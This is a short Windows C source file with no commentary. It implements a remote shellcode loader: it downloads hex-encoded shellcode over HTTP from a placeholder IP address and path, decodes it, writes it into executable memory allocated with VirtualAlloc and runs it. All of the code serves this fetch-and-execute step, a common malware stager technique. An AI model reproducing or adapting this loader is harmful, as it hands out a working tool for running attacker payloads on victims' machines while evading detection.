1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| #include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#pragma comment(lib, "WinInet.lib")
char * GetUrlPage(const char *URL, const char *SubPath)
{
HINTERNET hInternet, hConnect, hRequest = NULL;
DWORD dwOpenRequestFlags, dwRet = 0;
unsigned char *pResponseHeaderIInfo = NULL;
DWORD dwResponseHeaderIInfoSize = 2048;
BYTE *pBuf = NULL;
DWORD dwBufSize = 64 * 2048;
hInternet = InternetOpenA("WinInetGet/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
hConnect = InternetConnectA(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL == hConnect)
return NULL;
dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION |
INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD;
hRequest = HttpOpenRequestA(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
HttpSendRequest(hRequest, NULL, 0, NULL, 0);
pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize];
RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize);
HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL);
pBuf = new BYTE[dwBufSize];
RtlZeroMemory(pBuf, dwBufSize);
InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet);
return (char *)pBuf;
}
void main()
{
char *shellcode = GetUrlPage("ip地址", "/shellcode文件路径");
printf("%s \n", shellcode);
int shellcode_length = strlen(shellcode);
unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));
for (size_t count = 0; count < shellcode_length / 2; count++) {
sscanf_s(shellcode, "%2hhx", &value[count]);
shellcode += 2;
}
void *exec = VirtualAlloc(0, shellcode_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, value, shellcode_length / 2);
((void(*)())exec)();
}
|